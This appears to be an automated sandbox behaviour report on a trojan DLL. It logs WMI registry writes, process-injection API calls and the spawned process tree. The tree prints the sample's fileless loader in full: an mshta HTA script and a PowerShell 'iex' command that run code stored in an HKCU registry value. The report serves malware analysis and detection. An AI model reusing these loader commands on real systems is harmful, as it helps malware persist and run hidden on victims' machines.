Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset, 0_2_10001996
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001A44 NtMapViewOfSection, 0_2_10001A44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023A5 NtQueryVirtualMemory, 0_2_100023A5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0463DDC5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_0463DDC5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_0464104F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046318AC NtQueryInformationProcess, 3_2_046318AC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046391A2 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_046391A2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04623D0F NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04623D0F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462E5E9 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_0462E5E9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462DE4B memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_0462DE4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462FE2C memset,NtWow64QueryInformationProcess64,GetProcAddress, 3_2_0462FE2C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462981E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_0462981E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046259A0 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, 3_2_046259A0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462F19E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_0462F19E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04625210 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_04625210
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04622AB1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_04622AB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04624358 memset,NtQueryInformationProcess, 3_2_04624358
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0463B338 NtGetContextThread,RtlNtStatusToDosError, 3_2_0463B338
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462DB10 NtWow64ReadVirtualMemory64,GetProcAddress, 3_2_0462DB10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 7_2_04E95A27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E96604 GetProcAddress,NtCreateSection,memset, 7_2_04E96604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E94E06 NtMapViewOfSection, 7_2_04E94E06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E9B1A5 NtQueryVirtualMemory, 7_2_04E9B1A5
Source: C:\Windows\System32\control.exe Code function: 50_2_001B1044 NtWriteVirtualMemory, 50_2_001B1044
Source: C:\Windows\System32\control.exe Code function: 50_2_001A846C NtAllocateVirtualMemory, 50_2_001A846C
Source: C:\Windows\System32\control.exe Code function: 50_2_0019F8C8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 50_2_0019F8C8
Source: C:\Windows\System32\control.exe Code function: 50_2_001B0CC0 NtCreateSection, 50_2_001B0CC0
Source: C:\Windows\System32\control.exe Code function: 50_2_001A491C NtSetContextThread,NtUnmapViewOfSection,NtClose, 50_2_001A491C
Source: C:\Windows\System32\control.exe Code function: 50_2_001B6218 NtMapViewOfSection, 50_2_001B6218
Source: C:\Windows\System32\control.exe Code function: 50_2_001AB27C NtQueryInformationToken,NtQueryInformationToken,NtClose, 50_2_001AB27C
Source: C:\Windows\System32\control.exe Code function: 50_2_0019B3A8 NtQueryInformationProcess, 50_2_0019B3A8
Source: C:\Windows\System32\control.exe Code function: 50_2_0019FBEC NtReadVirtualMemory, 50_2_0019FBEC
Source: C:\Windows\System32\control.exe Code function: 50_2_001CB002 NtProtectVirtualMemory,NtProtectVirtualMemory, 50_2_001CB002
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046326C2 CreateProcessAsUserW, 3_2_046326C2
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002184 0_2_10002184
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04642D9C 3_2_04642D9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04626F3A 3_2_04626F3A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462D2AE 3_2_0462D2AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E93EE1 7_2_04E93EE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E9888E 7_2_04E9888E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04E9AF80 7_2_04E9AF80
Source: C:\Windows\System32\control.exe Code function: 50_2_001A491C 50_2_001A491C
Source: C:\Windows\System32\control.exe Code function: 50_2_0019775C 50_2_0019775C
Source: C:\Windows\System32\control.exe Code function: 50_2_001A1388 50_2_001A1388
Source: C:\Windows\System32\control.exe Code function: 50_2_00193034 50_2_00193034
Source: C:\Windows\System32\control.exe Code function: 50_2_001AD834 50_2_001AD834
Source: C:\Windows\System32\control.exe Code function: 50_2_001B1834 50_2_001B1834
Source: C:\Windows\System32\control.exe Code function: 50_2_001AEC58 50_2_001AEC58
Source: C:\Windows\System32\control.exe Code function: 50_2_001910B0 50_2_001910B0
Source: C:\Windows\System32\control.exe Code function: 50_2_001A58B4 50_2_001A58B4
Source: C:\Windows\System32\control.exe Code function: 50_2_001A54C8 50_2_001A54C8
Source: C:\Windows\System32\control.exe Code function: 50_2_001A04C4 50_2_001A04C4
Source: C:\Windows\System32\control.exe Code function: 50_2_001B10E0 50_2_001B10E0
Source: C:\Windows\System32\control.exe Code function: 50_2_001BAD08 50_2_001BAD08
Source: C:\Windows\System32\control.exe Code function: 50_2_0019E158 50_2_0019E158
Source: C:\Windows\System32\control.exe Code function: 50_2_001A4150 50_2_001A4150
Source: C:\Windows\System32\control.exe Code function: 50_2_00195998 50_2_00195998
Source: C:\Windows\System32\control.exe Code function: 50_2_0019D1B8 50_2_0019D1B8
Source: C:\Windows\System32\control.exe Code function: 50_2_001B1DA8 50_2_001B1DA8
Source: C:\Windows\System32\control.exe Code function: 50_2_001A79AC 50_2_001A79AC
Source: C:\Windows\System32\control.exe Code function: 50_2_001B95FC 50_2_001B95FC
Source: C:\Windows\System32\control.exe Code function: 50_2_0019AE04 50_2_0019AE04
Source: C:\Windows\System32\control.exe Code function: 50_2_001AB668 50_2_001AB668
Source: C:\Windows\System32\control.exe Code function: 50_2_001A2A88 50_2_001A2A88
Source: C:\Windows\System32\control.exe Code function: 50_2_0019BA8C 50_2_0019BA8C
Source: C:\Windows\System32\control.exe Code function: 50_2_001962DC 50_2_001962DC
Source: C:\Windows\System32\control.exe Code function: 50_2_001B52C8 50_2_001B52C8
Source: C:\Windows\System32\control.exe Code function: 50_2_001B86FC 50_2_001B86FC
Source: C:\Windows\System32\control.exe Code function: 50_2_001B5B1C 50_2_001B5B1C
Source: C:\Windows\System32\control.exe Code function: 50_2_001B9B14 50_2_001B9B14
Source: C:\Windows\System32\control.exe Code function: 50_2_001B8B50 50_2_001B8B50
Source: C:\Windows\System32\control.exe Code function: 50_2_0019EBBC 50_2_0019EBBC
Source: C:\Windows\System32\control.exe Code function: 50_2_001ACFB4 50_2_001ACFB4
Source: C:\Windows\System32\control.exe Code function: 50_2_0019FFE8 50_2_0019FFE8
PE file does not import any functions
Source: rzslcw3n.dll.44.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Uses 32bit PE files
Source: 2790000.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 2790000.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winDLL@82/256@56/19
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04632517 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 3_2_04632517
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D216EB03-DE55-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{3C30E525-6B4E-CE90-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF7279FB1455334C84.TMP
Source: 2790000.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2790000.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
